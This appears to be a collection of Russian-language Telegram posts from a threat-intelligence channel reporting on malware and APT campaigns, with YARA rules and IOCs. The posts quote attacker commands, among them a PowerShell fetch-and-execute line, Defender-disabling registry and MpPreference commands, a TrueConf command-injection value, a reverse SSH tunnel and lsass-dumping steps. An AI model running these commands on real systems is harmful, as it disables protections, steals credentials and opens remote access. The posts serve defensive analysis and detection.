Новое подключение к старым техникам 📡
В ходе расследования инцидентов команда PT ESC IR обнаружила реверс-шелл, разработанный на .NET и наблюдаемый с 2023 года. Злоумышленниками он использовался для управления скомпрометированными хостами. ВПО создает процесс
❕ Особенность инструмента в том, что он реализован средствами компонента
В функции
Метод
В методе
Для расшифровки данных конфигурации можно воспользоваться следующими рецептами CyberChef:
1. Генерация ключа, в который необходимо передать
2. Алгоритм расшифровки.
🗂 Вредоносные файлы были расположены в легитимных каталогах:
• C:\Program Files\Internet Explorer\mshealthupdate.exe
• C:\Program Files\Common Files\System\msadds.exe
• C:\Program Files\Common Files\System\ado\msader.exe
Для закрепления в инфраструктуре и запуска исполняемых файлов злоумышленники использовали планировщик задач Windows.
Данный инструмент схож с реализацией общеизвестной утилиты
YARA:
#IOC #yara #dfir #detect #win #ti #ir
@ptescalator
В ходе расследования инцидентов команда PT ESC IR обнаружила реверс-шелл, разработанный на .NET и наблюдаемый с 2023 года. Злоумышленниками он использовался для управления скомпрометированными хостами. ВПО создает процесс
cmd.exe и перенаправляет поток ввода/вывода на управляющий сервер, который, как правило, являлся одним из хостов во внутренней инфраструктуре. Для безопасного сетевого соединения использовалась техника защищенного TCP-клиента с SSL/TLS.System.Windows.Data из состава Windows Presentation Framework. Сама техника не новая — примитивы выполнения кода с использованием System.Windows.Data активно применяются при эксплуатации уязвимостей. Рассмотрим его реализацию подробнее.В функции
Main (скриншот 1) демонстрируется техника прямого выполнения через ObjectDataProvider из пространства имен System.Windows.Data. Несмотря на отсутствие явного вызова метода, при последовательной настройке свойств ObjectInstance, MethodParameters и, в завершение, MethodName объект автоматически инициирует выполнение указанного метода (Connect.Start) — прямо во время его инициализации в методе Main. Использование обертки ExpandedWrapper<Connect, ObjectDataProvider> указывает на заимствование паттерна из известных gadget-цепочек для десериализации, хотя в данном случае эксплуатация происходит напрямую, без этапа сериализации.Метод
Connect.Start (скриншот 2) запускает системную командную оболочку (cmd.exe) в качестве дочернего процесса, асинхронно перехватывает ее вывод через обработчик P_OutputDataReceived и перенаправляет данные обратно на C2-сервер, одновременно используя кастомный делегат (Delegate.Combine) для динамической связи с компонентом Px, отвечающим за сетевую передачу команд и результатов. Такая архитектура позволяет злоумышленнику выполнять произвольные команды в контексте cmd.exe на зараженной машине, сохраняя взаимодействие основанным на легитимных API .NET.В методе
Net.Run (скриншот 3) реализована сетевая C2-логика, устанавливающая зашифрованное соединение с удаленным сервером через TcpClient и SslStream с принудительным использованием TLS 1.2; IP-адрес и порт берутся из зашифрованных конфигурационных данных (скриншот 4) и расшифровываются «на лету» с помощью AES256 в режиме CBC/NoPadding, причем для генерации ключа используется PBKDF2 (RFC 2898), на вход которого передается строковое значение пароля и соли (скриншот 5).Для расшифровки данных конфигурации можно воспользоваться следующими рецептами CyberChef:
1. Генерация ключа, в который необходимо передать
App.PasswordHash и App.SaltKey;2. Алгоритм расшифровки.
🗂 Вредоносные файлы были расположены в легитимных каталогах:
• C:\Program Files\Internet Explorer\mshealthupdate.exe
• C:\Program Files\Common Files\System\msadds.exe
• C:\Program Files\Common Files\System\ado\msader.exe
Для закрепления в инфраструктуре и запуска исполняемых файлов злоумышленники использовали планировщик задач Windows.
Данный инструмент схож с реализацией общеизвестной утилиты
ncat. Для вызова вредоносного метода используется легитимный класс ObjectDataProvider из системной библиотеки WPF, применяются делегаты для динамического подключения обработчиков, не оставляя четкой цепочки вызовов в IL-коде. Для шифрования вывода консоли используется TLS 1.2 и игнорируются ошибки сертификата (ValidateServerCertificate => true), что позволяет работать с любым C2, включая динамические IP.YARA:
rule MSADDShell {
strings:
$v1 = "net_handlerDelOutDataNet"
$v2 = "P_OutputDataReceived"
$v3 = "add_OutputDataReceived"
$v4 = "SendDataFwd"
$v5 = "OnhandlerDelFwfPx"
$v6 = "OnhandlerDelOutDataNet"
$v7 = "msadds.exe" wide
condition:
uint16(0) == 0x5A4D and 5 of ($v*) and filesize < 100KB
}#IOC #yara #dfir #detect #win #ti #ir
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍9👏6❤1
Как молот грома помешал клешням безмолвия 🦀
Во время расследования инцидентов команда Incident Response при поддержке департамента Threat Intelligence обнаружила следы использования вредоносного ПО KrustyLoader.
Впервые это ВПО было описано в январе 2024 года экспертами из Volexity и Mandiant: они обнаружили его использование в атаках, нацеленных на эксплуатацию RCE-уязвимостей нулевого дня в Ivanti Connect Secure. Тогда же было указано, что KrustyLoader написан для Linux, однако позже появились версии для Windows. Примечательно, что на момент исследования загрузчик использовала только одна группировка, которую мы называем QuietCrabs.
Дальнейшее расследование позволило обнаружить активность другой группировки в инфраструктуре жертвы. Интересно, что действия второй группировки, вероятно, помешали QuietCrabs реализовать атаку и стали причиной, по которой на эту атаку обратили внимание.
Мы предполагаем, что второй группой является Thor. На основе изучения сетевой инфраструктуры злоумышленников и данных телеметрии мы пришли к выводу, что они проводили массовые атаки на российские компании. Для получения первоначального доступа к инфраструктуре группировка эксплуатировала ряд уязвимостей типа RCE (Remote Code Execution), например CVE-2025-53770, CVE-2021-27065.
😠 В статье мы покажем цепочки атак, которые обнаружили во время расследования, и расскажем про инструменты, используемые злоумышленниками. Читайте материал в нашем блоге.
#IR #TI #APT
@ptescalator
Во время расследования инцидентов команда Incident Response при поддержке департамента Threat Intelligence обнаружила следы использования вредоносного ПО KrustyLoader.
Впервые это ВПО было описано в январе 2024 года экспертами из Volexity и Mandiant: они обнаружили его использование в атаках, нацеленных на эксплуатацию RCE-уязвимостей нулевого дня в Ivanti Connect Secure. Тогда же было указано, что KrustyLoader написан для Linux, однако позже появились версии для Windows. Примечательно, что на момент исследования загрузчик использовала только одна группировка, которую мы называем QuietCrabs.
Дальнейшее расследование позволило обнаружить активность другой группировки в инфраструктуре жертвы. Интересно, что действия второй группировки, вероятно, помешали QuietCrabs реализовать атаку и стали причиной, по которой на эту атаку обратили внимание.
Мы предполагаем, что второй группой является Thor. На основе изучения сетевой инфраструктуры злоумышленников и данных телеметрии мы пришли к выводу, что они проводили массовые атаки на российские компании. Для получения первоначального доступа к инфраструктуре группировка эксплуатировала ряд уязвимостей типа RCE (Remote Code Execution), например CVE-2025-53770, CVE-2021-27065.
#IR #TI #APT
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
❤18🔥12☃8⚡4👏1
Какой пост от ESCalator на следующей неделе вы ждете больше всего? 😌
Anonymous Poll
11%
Обзор стилей новогодних корпоративных календарей 🎄
12%
Про «томатное гозе» 🍅
20%
Новый разбор группировки ExCobalt 🥷
12%
Рецепт оливье из 28 или 19 пунктов 🥗
2%
Пост с подборкой постов 🤑
9%
Рекламный 💰
11%
Следующую часть про Wireshark 🦈
8%
Мне нужны только опросы ✔️
13%
Я уже никому не верю и ничего не жду 😢
1%
Напишу в комментариях 💬
👍10❤9😁7🤔1
Мы бы очень хотели сделать для вас обзор «томатного гозе», но в пятницу вы проголосовали за новый разбор (Ex)Cobalt... 🙄
Это одна из наиболее активных и опасных групп, атакующих российские организации для похищения конфиденциальных данных и уничтожения инфраструктуры.
Наряду с хорошо известными и проверенными инструментами — бэкдором Cobint, шифровальщиками Babuk и Lockbit, а также разного рода сетевыми туннелями — группа продолжает создавать и развивать новые средства, такие как Pumakit и Octopus🐙
Обзор инструментов группы, которые она применяла в атаках в 2024–2025 годах, можно посмотреть в нашей статье.
#dfir #ir #linux #ti #malware
@ptescalator
Это одна из наиболее активных и опасных групп, атакующих российские организации для похищения конфиденциальных данных и уничтожения инфраструктуры.
Наряду с хорошо известными и проверенными инструментами — бэкдором Cobint, шифровальщиками Babuk и Lockbit, а также разного рода сетевыми туннелями — группа продолжает создавать и развивать новые средства, такие как Pumakit и Octopus
Обзор инструментов группы, которые она применяла в атаках в 2024–2025 годах, можно посмотреть в нашей статье.
#dfir #ir #linux #ti #malware
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥20😁15👏11🍾4❤1
He may not, as unvalued persons do, Carve for himself (W. Shakespeare)
При расследовании в инфраструктуре, подвергшейся шифрованию, регулярно возникает необходимость извлечения данных из образов дисков, где файловая система существенно повреждена.
В таких случаях извлечь данные
MFT, логи ОС или юзерские артефакты в состоянии, пригодном для обработки классическими инструментами, возможно далеко не всегда. Это порождает необходимость применения карвинга — восстановления или реконструкции поврежденных файлов. В ряде случаев доступные коммерческие инструменты, реализующие данную технику, дают неплохие результаты, но в целом имеют достаточно ограниченную область применения.В случае карвинга событий журналов ОС Windows хорошо зарекомендовала себя техника «забудь про BinXML»: для полноценного декодирования содержимого полей единичного события необходимы шаблоны, хранящиеся в заголовке чанка, который по понятным причинам может просто отсутствовать. Не пытаясь даже искать такие шаблоны, можно составить текстовое описание единичного события, где однозначно выделяются даты, хранимые в стандартных расположениях, коды событий и несколько других служебных полей, а также декодируемые «как текст» (с вырезанием служебных последовательностей
BinXML) байтовые последовательности, содержащие данные для подстановки в шаблоны.В итоге подобная техника позволяет получить существенно больше данных, нежели при попытке восстановления чанков
EVTX: имея дату, код события EventID и тип журнала, хранимый в виде текста, можно понять, о чем идет речь (скриншот 1).Схожий подход может применяться и для «живых» систем, где атакующие предприняли попытку удаления данных с целью сокрытия следов своих перемещений.
🔎 Для поиска остаточных данных таблицы
MFT, помимо восстановления единичных записей стандартного формата, в ряде случаев хорошо работает техника поиска единичных атрибутов: как правило, ценность представляют атрибуты типа 0x30, то есть $FILE_NAME, содержащие четыре метки времени, имя файла и его размер (скриншот 2). В отдельных случаях такие единичные атрибуты даже для «живой» системы позволяют обнаружить, например, в файле подкачки (pagefile.sys) следы присутствия вредоносных файлов, отсутствующие в других артефактах. Подобные результаты также возможно получить с помощью поиска USN-записей, содержащих одну метку времени и имя файла, с которым производились какие-либо операции ФС (скриншот 3).💽 Для поиска исполняемых файлов в образе диска хорошо работает тактика поиска заголовка
PE с последующей оценкой размера файла по совокупному размеру секций. При небольшом усложнении алгоритма возможно реализовать более точный подход: определение энтропии конечных фрагментов файла с последовательным уменьшением размера фрагмента до момента перехода эмпирически определенного порогового значения «снизу вверх» при соблюдении паддинга в ряде случаев позволяет получить исполняемые файлы с совпадением по хешу. Однако даже «вырубленные топором» исполняемые файлы ВПО или их фрагменты прекрасно детектируются с помощью YARA-правил (скриншоты 4, 5).📁 Для восстановления файлов реестра возможно использование поиска по заголовку с определением размера файла по полю
HiveBinsDataSize: данное приближение в ряде случаев позволяет получить набор файлов, пригодных для обработки классическими инструментами. Характерной особенностью в данном случае является наличие в заголовке даты модификации и типа файла (primary/log), а также имени файла в UTF-16 размером 64 байта. Несмотря на то что для некоторых потенциально интересных с точки зрения форензики файлов (UsrClass.dat) структура пути не позволяет определить с достаточной точностью исходное размещение файла, для большинства случаев имеющейся информации вполне достаточно.Наконец, прекрасно зарекомендовала себя техника поиска в образе диска читаемых текстовых фрагментов, ассоциируемых с выявленным инструментарием атакующих: в ряде случаев она позволяет восстановить командлайны и логи использованных инструментов, включая пароли, имена УЗ и подобные «приятные мелочи» (скриншот 6).
#yara #dfir #ir #windows
@ptescalator
🔥16❤12👍7
Использование DefendNot в атаках с XWorm 🪱
Группа киберразведки зафиксировала фишинговую активность, целью которой являлась кража данных с последующим вымогательством денежных средств (скриншот 1). В ходе анализа были идентифицированы две параллельно используемые злоумышленниками цепочки доставки, различающиеся по начальному вектору, но сходящиеся на единой инфраструктуре и финальном вредоносном компоненте.
🌹 Отдельно примечателен выбор инфраструктуры: для распространения компонентов используется GitHub-репозиторий death-note. Забавно, что автор отсылает к известному произведению Death Note, где старшеклассник получает в руки особую тетрадь.
• В первой цепочке в качестве первичного стейджа использовались VBScript-файлы (скриншот 2), содержащие обфусцированный скрипт. После запуска жертвой VBS-файла происходило скачивание с GitHub-репозитория злоумышленника текстового файла-приманки (скриншот 3) и его запуск для создания видимости легитимного процесса, а также выгрузка и запуск вредоносного VBE-скрипта «
Указанный скрипт выполнял деактивацию средств защиты Windows, в том числе Microsoft Defender с использованием проекта DefendNot, а также дропал и запускал дополнительный модуль
После этого запускался DefendNot, который регистрирует фиктивный антивирус через Windows Security Center и переводит Defender в отключенное состояние штатными средствами ОС. Завершающим этапом из того же репозитория загружался и запускался исполняемый файл, идентифицированный как XWorm RAT.
• Во второй цепочке в начальном стейдже использовались LNK-файлы. Ярлык либо напрямую загружал и исполнял PowerShell-скрипт из GitHub-репозитория, либо выполнял эквивалентную команду в Base64-представлении (скриншот 4). Запущенный PowerShell-скрипт (скриншот 5) создавал текстовый файл, заполнял его псевдослужебным (скриншот 3) содержимым и открывал для пользователя, маскируя вредоносную активность под офисный документооборот. После этого скрипт загружал из того же GitHub-репозитория файл
🕵️ Изучив метаданные семплов XWorm, нам удалось обнаружить более ранние атаки, датируемые концом сентября, где вместо GitHub-репозитория распространение ВПО осуществлялось через облачные файловые хранилища, такие как Dropbox, Box и Яндекс.Диск. Это может свидетельствовать об эволюции инфраструктуры распространения и постепенном смещении акцента в сторону GitHub как удобной и менее подозрительной для пользователя площадки доставки.
💡 Отдельного внимания заслуживает использование DefendNot. Изначально он позиционируется как открытый PoC-проект, демонстрирующий возможность регистрации фиктивного антивируса в Windows Security Center и последующего штатного отключения Microsoft Defender без эксплуатации уязвимостей. Базовый сценарий установки и запуска сводится к однострочной команде PowerShell вида:
С ее помощью загружается установочный скрипт, скачивается и распаковывается архив, после чего PoC разворачивается в каталоге
На практике подобные инструменты ранее практически не встречались в реальных атаках, поэтому задокументированное использование DefendNot в кампании указывает на растущую заинтересованность злоумышленников в переиспользовании публичных исследовательских разработок для отключения встроенных средств защиты.
#TI #Phishing #malware #win
@ptescalator
Группа киберразведки зафиксировала фишинговую активность, целью которой являлась кража данных с последующим вымогательством денежных средств (скриншот 1). В ходе анализа были идентифицированы две параллельно используемые злоумышленниками цепочки доставки, различающиеся по начальному вектору, но сходящиеся на единой инфраструктуре и финальном вредоносном компоненте.
• В первой цепочке в качестве первичного стейджа использовались VBScript-файлы (скриншот 2), содержащие обфусцированный скрипт. После запуска жертвой VBS-файла происходило скачивание с GitHub-репозитория злоумышленника текстового файла-приманки (скриншот 3) и его запуск для создания видимости легитимного процесса, а также выгрузка и запуск вредоносного VBE-скрипта «
SCRRC4ryuk.vbe» (скриншот 4).Указанный скрипт выполнял деактивацию средств защиты Windows, в том числе Microsoft Defender с использованием проекта DefendNot, а также дропал и запускал дополнительный модуль
telegram_worker.vbs, отвечающий за скрытую съемку экрана и отправку скриншотов в Telegram с использованием API и бота. Дополнительно перед запуском DefendNot злоумышленники выполняли ряд PowerShell-команд, таких как Set-MpPreference и Add-MpPreference, для отключения механизмов защиты и добавления в исключения каталогов, где размещаются и запускаются вредоносы.После этого запускался DefendNot, который регистрирует фиктивный антивирус через Windows Security Center и переводит Defender в отключенное состояние штатными средствами ОС. Завершающим этапом из того же репозитория загружался и запускался исполняемый файл, идентифицированный как XWorm RAT.
• Во второй цепочке в начальном стейдже использовались LNK-файлы. Ярлык либо напрямую загружал и исполнял PowerShell-скрипт из GitHub-репозитория, либо выполнял эквивалентную команду в Base64-представлении (скриншот 4). Запущенный PowerShell-скрипт (скриншот 5) создавал текстовый файл, заполнял его псевдослужебным (скриншот 3) содержимым и открывал для пользователя, маскируя вредоносную активность под офисный документооборот. После этого скрипт загружал из того же GitHub-репозитория файл
SCRRC4ryuk.vbe с последующим запуском. Дальнейшие стадии полностью совпадают с первой цепочкой и также приводят к развертыванию XWorm RAT на рабочей станции жертвы.💡 Отдельного внимания заслуживает использование DefendNot. Изначально он позиционируется как открытый PoC-проект, демонстрирующий возможность регистрации фиктивного антивируса в Windows Security Center и последующего штатного отключения Microsoft Defender без эксплуатации уязвимостей. Базовый сценарий установки и запуска сводится к однострочной команде PowerShell вида:
irm https://dnot.sh/ | iex
С ее помощью загружается установочный скрипт, скачивается и распаковывается архив, после чего PoC разворачивается в каталоге
C:\Program Files\defendnot\ и запускается. В процессе работы DefendNot добавляет себя в автозагрузку текущего пользователя, сохраняя эффект отключения Defender после перезагрузки.На практике подобные инструменты ранее практически не встречались в реальных атаках, поэтому задокументированное использование DefendNot в кампании указывает на растущую заинтересованность злоумышленников в переиспользовании публичных исследовательских разработок для отключения встроенных средств защиты.
#TI #Phishing #malware #win
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🔥9💯6❤3
В дополнение к посту 👆
Отключение Defender / MpPreference
Модификация Defender через reg.exe
Defendnot
IoCs:
#TI #Phishing #malware #win
@ptescalator
Отключение Defender / MpPreference
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableBehaviorMonitoring $true
Set-MpPreference -DisableBlockAtFirstSeen $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableScriptScanning $true
Add-MpPreference -ExclusionPath 'C:\ProgramData'
Add-MpPreference -ExclusionPath $env:USERPROFILE'\Downloads'
Модификация Defender через reg.exe
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
Defendnot
#Директория по умолчанию
C:\Prorgam Files\defendnot\
#Скачивание и запуск Defendnot
irm https://dnot.sh/ | iex
#Запуск Defendnot в скрытном режиме и добавление задачи в автозагрузку из-под текущего пользователя
"C:\Program Files\defendnot\defendnot-loader.exe" --silent --autorun-as-user
IoCs:
Defendnot
dnot.sh
734d301654affee77396b554ccb04e0e
752e74a143212b9779aa98ec6f736bac
C2 XWorm
tcp.cloudpub.ru:56409
fair-equation.gl.at.ply.gg:57489
lnk-файлы
aebad92d84ae4f4b64748bc94798d401
abd0364a25d1e7ee2bc9320c74e125fc
powershell-файлы
087dbfed9667fb870af265aed35f82e3
ef7b11685c154e54deaf5c26f6d8ea59
85a98d0f58cf08cb7206286b51312661
vbs\vbe-файлы
0bbccecdd13c7b9c4af3273b1ae8e133
ebcb3e0d61ed5774d4e336f5e96ee9b4
9c5a00fe40783497752bcfbd75937fa7
3ec80f2d06dd8f6a8e60d0e8753255e7
xWorm
48bed9e98053e1e3ce0d4fb21fda2804
cab6f558f996db5a80e2a3bd5d443154
82294c916ba0ab95382509f51724716a
092712dc61fce5ef0ad0ddebb90059be
#TI #Phishing #malware #win
@ptescalator
👍10🔥8🤯7❤1
Какой подарок на Новый год вы больше всего ждете? 🎁
Anonymous Poll
21%
Календарь с волчихами 🔞
10%
Отчет об угрозах на 500 страниц 📑
2%
Уведомление об инциденте 🚨
6%
Лицензию на SIEM 🛒
4%
Пачку годных хешей 💼
21%
Выходные 😴
10%
Идеального ИИ-помощника🤖
11%
Согласованный без проблем бюджет на ИБ на следующий год 👌
13%
Не дежурить в Новый год 🎄
1%
Напишу в комментариях 💭
😁11🎄7☃5❤3
Operation CyberPosi 🤔
Команда PT ESC IR совместно с командой Threat Intelligence наблюдают новую кампанию APT-группировки PhantomCore, в которой атакующие массово взламывают компании через цепочку уязвимостей (BDU:2025-10114, BDU:2025-10115, BDU:2025-10116) в сервисе видеоконференцсвязи TrueConf.
Информация про уязвимости в сервисе была опубликована в августе в БДУ ФСТЭК, а также были выпущены рекомендации по обновлению. Ранее про использование данных уязвимостей сообщали специалисты RED Security в своем материале.
👀 Пример выполнения команды после эксплуатации от имени процесса
Пример события в журналах для обнаружения фактов компрометации:
Получив доступ в инфраструктуру, атакующие действуют достаточно избирательно и используют разные техники для маскировки своей активности под действия специалистов по информационной безопасности.
После этого атакующие развивают атаку в сети и продвигаются в инфраструктуре, используя протоколы удаленного управления
Для развития атаки и получения доступа к привилегированным учетным записям злоумышленники получали дамп процесса
• DFIR-утилита для создания дампа оперативной памяти DumpIt (
• библиотека файловой системы Dokan
• утилита для анализа дампов оперативной памяти MemProcFS (
На хостах атакующие закреплялись, используя в первую очередь ряд собственных инструментов:
• HeartDoor
• MacTunnelRAT (предназначен для создания обратного SSH-туннеля)
• PhantomSscp (предназначен для создания обратного SSH-туннеля)
• OpenSSH (
• Velociraptor
Особое внимание мы обращаем на установку утилиты Velociraptor, которая, как правило, используется специалистами в ходе расследования инцидентов информационной безопасности, а атакующими — для удаленного управления. Ранее про использование DFIR-инструмента атакующими сообщали специалисты Solar 4RAYS.
Пример конфигурации:
Файловые пути и IoCs в посте ниже 🔽
#ioc #dfir #ti #ir #detect #apt #PhantomCore
@ptescalator
Команда PT ESC IR совместно с командой Threat Intelligence наблюдают новую кампанию APT-группировки PhantomCore, в которой атакующие массово взламывают компании через цепочку уязвимостей (BDU:2025-10114, BDU:2025-10115, BDU:2025-10116) в сервисе видеоконференцсвязи TrueConf.
Информация про уязвимости в сервисе была опубликована в августе в БДУ ФСТЭК, а также были выпущены рекомендации по обновлению. Ранее про использование данных уязвимостей сообщали специалисты RED Security в своем материале.
tc_server.exe:cmd.exe /s /c "C:\\Program Files\\TrueConf Server\\tc_server.exe" /mode:1 /ServerID:a /ServerName:aaa1111#vcs /Serial:||whoami|| /File:"C:\\TrueConf\\activation\\offlinereg.vrg"
Пример события в журналах для обнаружения фактов компрометации:
error: the required argument for option '--Serial' is missing
Получив доступ в инфраструктуру, атакующие действуют достаточно избирательно и используют разные техники для маскировки своей активности под действия специалистов по информационной безопасности.
После этого атакующие развивают атаку в сети и продвигаются в инфраструктуре, используя протоколы удаленного управления
WinRM и RDP. Использование WinRM можно мониторить в событиях Windows, а также в реестре:\Microsoft\Windows\CurrentVersion\WSMAN\SafeClientList\WSManSafeClientList
Для развития атаки и получения доступа к привилегированным учетным записям злоумышленники получали дамп процесса
lsass, используя для этого такие инструменты, как:• DFIR-утилита для создания дампа оперативной памяти DumpIt (
DumpIt.exe /O dump.dmp)• библиотека файловой системы Dokan
• утилита для анализа дампов оперативной памяти MemProcFS (
memprocfs.exe -device dump.dmp / M:\name\lsass.exe-123\minidump)На хостах атакующие закреплялись, используя в первую очередь ряд собственных инструментов:
• HeartDoor
• MacTunnelRAT (предназначен для создания обратного SSH-туннеля)
• PhantomSscp (предназначен для создания обратного SSH-туннеля)
• OpenSSH (
ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 39433 -p 443 [REDACTED]@[REDACTED])• Velociraptor
Особое внимание мы обращаем на установку утилиты Velociraptor, которая, как правило, используется специалистами в ходе расследования инцидентов информационной безопасности, а атакующими — для удаленного управления. Ранее про использование DFIR-инструмента атакующими сообщали специалисты Solar 4RAYS.
Пример конфигурации:
version:
name: velociraptor
version: 0.74.2
commit: 121178eb6
build_time: "2025-04-20T01:04:04Z"
...
Client:
server_urls:
- https://telecom-connect.online/
windows_installer:
service_name: WindowsSecurityAgentSvc
install_path: C:\Windows\System32\Windows Security Health\SecurityHealhAgent.exe
service_description: Windows Security Agent Service
...
Файловые пути и IoCs в посте ниже 🔽
#ioc #dfir #ti #ir #detect #apt #PhantomCore
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
❤16🔥13⚡11🙊3🤡1🌚1